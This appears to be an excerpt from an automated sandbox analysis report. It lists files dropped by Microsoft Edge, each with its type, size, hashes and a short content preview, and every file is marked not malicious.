                                                                                                                                                                                                                                                                                      Preview:SNSS.......(.uk...........(.uk......"(.uk...........(.uk.......(.uk.......).uk.......).uk....!..).uk...............................(.uk).uk1..,...).uk$...597b8143_f503_40b7_b109_8e8f4220b3dd...(.uk.......).uk....|..........(.uk...(.uk.......................(.uk....................5..0...(.uk&...{4B3AC14B-43E5-4896-86E8-9E7D502CE1B5}.....(.uk.......(.uk..........................).uk...........).uk........edge://newtab/......N.e.w. .t.a.b...........!...............................................................x...............................x...........;*......;*.................................. ...................................................r...h.t.t.p.s.:././.n.t.p...m.s.n...c.o.m./.e.d.g.e./.n.t.p.?.l.o.c.a.l.e.=.e.n.-.G.B.&.t.i.t.l.e.=.N.e.w.%.2.0.t.a.b.&.d.s.p.=.1.&.s.p.=.B.i.n.g.&.i.s.F.R.E.M.o.d.a.l.B.a.c.k.g.r.o.u.n.d.=.1.&.s.t.a.r.t.p.a.g.e.=.1.&.P.C.=.U.5.3.1.....................................8.......0.......8............................................................
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):20480
                                                                                                                                                                                                                                                                                      Entropy (8bit):0.44194574462308833
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:12:TLiNCcUMskMVcIWGhWxBzEXx7AAQlvsdFxOUwa5qgufTJpbZ75fOS:TLisVMnYPhIY5Qlvsd6UwccNp15fB
                                                                                                                                                                                                                                                                                      MD5:B35F740AA7FFEA282E525838EABFE0A6
                                                                                                                                                                                                                                                                                      SHA1:A67822C17670CCE0BA72D3E9C8DA0CE755A3421A
                                                                                                                                                                                                                                                                                      SHA-256:5D599596D116802BAD422497CF68BE59EEB7A9135E3ED1C6BEACC48F73827161
                                                                                                                                                                                                                                                                                      SHA-512:05C0D33516B2C1AB6928FB34957AD3E03CB0A8B7EEC0FD627DD263589655A16DEA79100B6CC29095C3660C95FD2AFB2E4DD023F0597BD586DD664769CABB67F8
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):355
                                                                                                                                                                                                                                                                                      Entropy (8bit):5.146672217215783
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:6:DyfJIq2PcNwi23oH+Tcwt7Uh2ghZIFUt8WyfOZmw+WyfikwOcNwi23oH+Tcwt7UT:NvLZYebIhHh2FUt8I/+Q54ZYebIhHLJ
                                                                                                                                                                                                                                                                                      MD5:83227E27951E679385A423FE3A135C65
                                                                                                                                                                                                                                                                                      SHA1:2B098425319FD7ECB01163BA3BA8D01B916C717D
                                                                                                                                                                                                                                                                                      SHA-256:F35C844903ADA2A15BFBE330C5E0E5F696E38AAE498730E6A84249F6F348EA61
                                                                                                                                                                                                                                                                                      SHA-512:ACB204588153AAA5D6E7747FFED9FE57425195C00E8F1114EE94F05088BBE95103C0CB2848D777B82981D1EB1FEF89CC59A20605AA647C83DB3977E6DD4C0C91
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:2024/12/27-03:05:22.316 c90 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/MANIFEST-000001.2024/12/27-03:05:22.317 c90 Recovering log #3.2024/12/27-03:05:22.317 c90 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/000003.log .
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):270336
                                                                                                                                                                                                                                                                                      Entropy (8bit):0.0012471779557650352
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:3:MsEllllkEthXllkl2zE:/M/xT02z
                                                                                                                                                                                                                                                                                      MD5:F50F89A0A91564D0B8A211F8921AA7DE
                                                                                                                                                                                                                                                                                      SHA1:112403A17DD69D5B9018B8CEDE023CB3B54EAB7D
                                                                                                                                                                                                                                                                                      SHA-256:B1E963D702392FB7224786E7D56D43973E9B9EFD1B89C17814D7C558FFC0CDEC
                                                                                                                                                                                                                                                                                      SHA-512:BF8CDA48CF1EC4E73F0DD1D4FA5562AF1836120214EDB74957430CD3E4A2783E801FA3F4ED2AFB375257CAEED4ABE958265237D6E0AACF35A9EDE7A2E8898D58
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):440
                                                                                                                                                                                                                                                                                      Entropy (8bit):5.2368194404922885
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:12:yDM+vLZYebvqBQFUt8hg/+WDMV54ZYebvqBvJ:slYebvZg8zoYebvk
                                                                                                                                                                                                                                                                                      MD5:D9EF6E5754D1A07CAB59E7F8C256D217
                                                                                                                                                                                                                                                                                      SHA1:73CE23BA73D259D4CB43AB1D9A56A3993F613AD0
                                                                                                                                                                                                                                                                                      SHA-256:F25FF1617BC373D82EFE36445F8A3B92C6F23A8D8BF1B8A159E99CD42B63C524
                                                                                                                                                                                                                                                                                      SHA-512:F4FEE324476075E99D3D49684D18D7EA7BD64574D143A4EE3CF0C17CA193F16A05509AA72648BD65B1C640B5D5CD7257BE33D4820112835781CC444C56E9138B
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:2024/12/27-03:05:22.994 15fc Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/MANIFEST-000001.2024/12/27-03:05:22.996 15fc Recovering log #3.2024/12/27-03:05:22.999 15fc Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/000003.log .
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):440
                                                                                                                                                                                                                                                                                      Entropy (8bit):5.2368194404922885
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:2024/12/27-03:05:22.994 15fc Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/MANIFEST-000001.2024/12/27-03:05:22.996 15fc Recovering log #3.2024/12/27-03:05:22.999 15fc Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/000003.log .
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):2
                                                                                                                                                                                                                                                                                      Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:[]
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):2
                                                                                                                                                                                                                                                                                      Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:[]
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):111
                                                                                                                                                                                                                                                                                      Entropy (8bit):4.718418993774295
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:{"net":{"http_server_properties":{"servers":[],"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G"}}}
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):2
                                                                                                                                                                                                                                                                                      Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:[]
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):2
                                                                                                                                                                                                                                                                                      Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:[]
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):40
                                                                                                                                                                                                                                                                                      Entropy (8bit):4.1275671571169275
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:{"SDCH":{"dictionaries":{},"version":2}}
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 9, cookie 0x7, schema 4, UTF-8, version-valid-for 4
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):36864
                                                                                                                                                                                                                                                                                      Entropy (8bit):0.3886039372934488
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:24:TLqEeWOT/kIAoDJ84l5lDlnDMlRlyKDtM6UwccWfp15fBIe:T2EeWOT/nDtX5nDOvyKDhU1cSB
                                                                                                                                                                                                                                                                                      MD5:DEA619BA33775B1BAEEC7B32110CB3BD
                                                                                                                                                                                                                                                                                      SHA1:949B8246021D004B2E772742D34B2FC8863E1AAA
                                                                                                                                                                                                                                                                                      SHA-256:3669D76771207A121594B439280A67E3A6B1CBAE8CE67A42C8312D33BA18854B
                                                                                                                                                                                                                                                                                      SHA-512:7B9741E0339B30D73FACD4670A9898147BE62B8F063A59736AFDDC83D3F03B61349828F2AE88F682D42C177AE37E18349FD41654AEBA50DDF10CD6DC70FA5879
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:SQLite format 3......@ ..........................................................................j..........g...}.....$.X..............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):111
                                                                                                                                                                                                                                                                                      Entropy (8bit):4.718418993774295
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:3:YLb9N+eAXRfHDH2LS7PMVKJq0nMb1KKqk1Yn:YHpoeS7PMVKJTnMRKXk1Yn
                                                                                                                                                                                                                                                                                      MD5:807419CA9A4734FEAF8D8563A003B048
                                                                                                                                                                                                                                                                                      SHA1:A723C7D60A65886FFA068711F1E900CCC85922A6
                                                                                                                                                                                                                                                                                      SHA-256:AA10BF07B0D265BED28F2A475F3564D8DDB5E4D4FFEE0AB6F3A0CC564907B631
                                                                                                                                                                                                                                                                                      SHA-512:F10D496AE75DB5BA412BD9F17BF0C7DA7632DB92A3FABF7F24071E40F5759C6A875AD8F3A72BAD149DA58B3DA3B816077DF125D0D9F3544ADBA68C66353D206C
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:{"net":{"http_server_properties":{"servers":[],"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G"}}}
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):40
                                                                                                                                                                                                                                                                                      Entropy (8bit):4.1275671571169275
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                                                                                                                                                                                                                                                                      MD5:20D4B8FA017A12A108C87F540836E250
                                                                                                                                                                                                                                                                                      SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                                                                                                                                                                                                                                                                      SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                                                                                                                                                                                                                                                      SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:{"SDCH":{"dictionaries":{},"version":2}}
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):80
                                                                                                                                                                                                                                                                                      Entropy (8bit):3.4921535629071894
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:3:S8ltHlS+QUl1ASEGhTFljl:S85aEFljl
                                                                                                                                                                                                                                                                                      MD5:69449520FD9C139C534E2970342C6BD8
                                                                                                                                                                                                                                                                                      SHA1:230FE369A09DEF748F8CC23AD70FD19ED8D1B885
                                                                                                                                                                                                                                                                                      SHA-256:3F2E9648DFDB2DDB8E9D607E8802FEF05AFA447E17733DD3FD6D933E7CA49277
                                                                                                                                                                                                                                                                                      SHA-512:EA34C39AEA13B281A6067DE20AD0CDA84135E70C97DB3CDD59E25E6536B19F7781E5FC0CA4A11C3618D43FC3BD3FBC120DD5C1C47821A248B8AD351F9F4E6367
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:*...#................version.1..namespace-..&f.................&f...............
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):428
                                                                                                                                                                                                                                                                                      Entropy (8bit):5.234427865207498
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:12:LXu9+vLZYebvqBZFUt8iXaoJ/+i09V54ZYebvqBaJ:1lYebvyg8FoYebvL
                                                                                                                                                                                                                                                                                      MD5:FD0449DE90134CF49F91DE9D09178994
                                                                                                                                                                                                                                                                                      SHA1:F6AAD049DC4D7A98B49D891BA96B36EE5A8EDF5F
                                                                                                                                                                                                                                                                                      SHA-256:A5001A352274E22900CAF406895E94152D3E4CA088FC4A74350CF1F71966646F
                                                                                                                                                                                                                                                                                      SHA-512:2E998B58D5A541C951A659C3C03555C769F3484C4959F28A47DDB582BC37B46C179C84C5F61279C59A036420175D8B868E8FF4B76DBBFCD0E9DAA5D542370FA5
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:2024/12/27-03:05:41.025 184c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/MANIFEST-000001.2024/12/27-03:05:41.026 184c Recovering log #3.2024/12/27-03:05:41.030 184c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/000003.log .
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):331
                                                                                                                                                                                                                                                                                      Entropy (8bit):5.193184344735284
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:6:Dyfmt4q2PcNwi23oH+TcwtpIFUt8WyfFtZmw+WyfFfkwOcNwi23oH+Tcwta/WLJ:T4vLZYebmFUt8B/+b54ZYebaUJ
                                                                                                                                                                                                                                                                                      MD5:A0AC030D3BB4E926CC86E52F805F1DED
                                                                                                                                                                                                                                                                                      SHA1:AB3B94FB3EC78AB70847A67741DD642E0892789A
                                                                                                                                                                                                                                                                                      SHA-256:7A604A5A5DEE227E877D24C1ECA36569100CBCF74EA631F3ED893E621E9C3AE6
                                                                                                                                                                                                                                                                                      SHA-512:5EDB3CCD7E5678DDDDF35155C96432F1D9D1B08991DB7872587075EF5C6E56DB22E32BD346C871B7C8FB586E6130B10177F8EDB0C0CBD3C113147FEBC2A76203
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:2024/12/27-03:05:22.238 c90 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/MANIFEST-000001.2024/12/27-03:05:22.239 c90 Recovering log #3.2024/12/27-03:05:22.239 c90 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/000003.log .
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 9, database pages 91, cookie 0x36, schema 4, UTF-8, version-valid-for 9
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):196608
                                                                                                                                                                                                                                                                                      Entropy (8bit):1.265142166671222
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:384:KrJ/2qOB1nxCkMXSAELyKOMq+8HKkjucswRv8p3nVum1:K0q+n0JX9ELyKOMq+8HKkjuczRv895
                                                                                                                                                                                                                                                                                      MD5:7749D35D26380A5605EBD39948BD12CA
                                                                                                                                                                                                                                                                                      SHA1:A694839C1E844DE9DEA58022064A3DFA2FF6B8D5
                                                                                                                                                                                                                                                                                      SHA-256:EFF6E373B3FD123F4B0A64862FF00B0181C7220DD7EC7B635ABF15065902B075
                                                                                                                                                                                                                                                                                      SHA-512:557F7EAF39F3F75FDD2B513C32BEECCFF2856FB82830B8D7A73D40FD269041A7D545294D3762081B85FDFC4754187D3936679FC20DA68506FABF6E4DD49639D8
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 10, cookie 0x7, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):40960
                                                                                                                                                                                                                                                                                      Entropy (8bit):0.4668568336674349
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:48:Tnj7dojKsKmjKZKAsjZNOjAhts3N8g1j3UcB0kAM9:v7doKsKuKZKlZNmu46yjx0kX9
                                                                                                                                                                                                                                                                                      MD5:2FBB71CE155509767B0EFC0044E4FC17
                                                                                                                                                                                                                                                                                      SHA1:D20864C0897E642364852534889A270D2ADECE03
                                                                                                                                                                                                                                                                                      SHA-256:F006D21C560C67700E008E45B85DCBDE5F772AC9CAAE4334B9E8C686C8272ACC
                                                                                                                                                                                                                                                                                      SHA-512:F1CCBBA73BCAB78FB76D68194312E241871E6408C9D3222B5DC905AD6BBDFCDC249B9BDF61EA3669A14D6FC3EB8576EB46C9310585F36F0799E73AD3FB5C5441
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):12824
                                                                                                                                                                                                                                                                                      Entropy (8bit):0.13690319541285847
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:3:sd9Nllv/etXlf5Bel7o34//l/h4jRfn1d7jdtQflla6o7l29sXtXlfe:sSlxBem4puj3dndgla6o7kalG
                                                                                                                                                                                                                                                                                      MD5:B2585DE48118C301EA13DD18184C861A
                                                                                                                                                                                                                                                                                      SHA1:552D3EA9AB59F35B30D314B17D4E4968CAF5F4C2
                                                                                                                                                                                                                                                                                      SHA-256:A35FD3BD1DBC4B2A36B0313DEB85F5B0581153D522B0C307D773EBA71E0C1EE1
                                                                                                                                                                                                                                                                                      SHA-512:FCC0C0CFBEC9F6FB0E14ED4EC88753454378E1DC6836DB233D280079613CFF7A6D181F8F73BFA1708B19E0BA7A226A61E37A83900B71FD7427523EF1AD96B6EC
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:very short file (no magic)
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):1
                                                                                                                                                                                                                                                                                      Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:3:L:L
                                                                                                                                                                                                                                                                                      MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                                                                                                                                                      SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                                                                                                                                                      SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                                                                                                                                                      SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:.
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:Unicode text, UTF-8 text, with very long lines (17666), with no line terminators
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):17668
                                                                                                                                                                                                                                                                                      Entropy (8bit):5.4844859493009634
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:192:stnJ99QTryDiuabatSuyp8BsIYyaNPOpegzkXMlNsNXphzd8J2w516o8VmbV+Fpx:stnPGQSu48BsIYtJOpnizdgtbbG6QwKl
                                                                                                                                                                                                                                                                                      MD5:306D26E65D2A4DB7BA43F1538CBF7792
                                                                                                                                                                                                                                                                                      SHA1:3005EE713B5774F38D36EDD17A0FEA3584766141
                                                                                                                                                                                                                                                                                      SHA-256:8F8CAA6E760459B6F1950F3328F45E11F9EA274E4FA14B887D603C37AE750171
                                                                                                                                                                                                                                                                                      SHA-512:0A09F4CB96ABB713EA943088DD6954BA9F3AFE3AA509066F830771B13096DBB2CF2C6E5AF94CBD25FA137A8DF0F6D486915BC0D7446CEDC2E0C0C8017F653BDB
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13379760322732592","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340965831357520","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"2caf0cf4-ea42-4083-b928-29b39da1182b":{"last_path":""},"2cb2db96-3bd0-403e-abe2-9269b3761041":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):9680
                                                                                                                                                                                                                                                                                      Entropy (8bit):5.112583781537505
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:192:stnkdp8BsIYyaNP9kXOIo8VmbV+Fp4QAXCPSYJ:stnQ8BsIYtJdbG6Q/
                                                                                                                                                                                                                                                                                      MD5:AF13559DB3792877F272DFB0170D6985
                                                                                                                                                                                                                                                                                      SHA1:19AF7DE8B4B0AE12C9951B7DB5E767C4F0664EE6
                                                                                                                                                                                                                                                                                      SHA-256:5B9CE1293A69C58C6F0555E4339916B37E3934AB3C38ED4B112F7303121F24ED
                                                                                                                                                                                                                                                                                      SHA-512:F690D82A8A326D0E2398679AFEEBDD9BA6E9B55A1A4E2D770015B9B417CE4D76E92D064A6DA0B31ED9C042C5911F07D3E304605FAE3AD19144B6A98A87AD7748
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13379760322732592","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340965831357520","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"should_reset_check_default_browser":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":882,"browser_content_container_width":1236,"browser_content_container_x":0,"browser_content_container_y":102,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1,"datatype_details_migration_performed":true},"co
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):25012
                                                                                                                                                                                                                                                                                      Entropy (8bit):5.566941256586088
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:768:XQRbVbWP4afHe8F1+UoAYDCx9Tuqh0VfUC9xbog/OVyvhkSrwHpKtuCX:XQRbVbWP4afHeu1jafJkX8td
                                                                                                                                                                                                                                                                                      MD5:946A5A87E6740BEE007FD0C171107444
                                                                                                                                                                                                                                                                                      SHA1:66765AD1C24D8A94C3A8E5E60AEBF8134B387370
                                                                                                                                                                                                                                                                                      SHA-256:22380EF05AA67C241F3770C2A5B322AFD4CFCBF467E690FA7F660F57BC63FC20
                                                                                                                                                                                                                                                                                      SHA-512:F50D7474842F500ED4135B8A0B433A30AE05D7E4D8AED19ADCB4F16088E76428DD8E81B77AA865E393386C21E3902B73B4DCCDBE8A509C4C8ED79838BC0058F4
                                                                                                                                                                                                                                                                                      Malicious:false
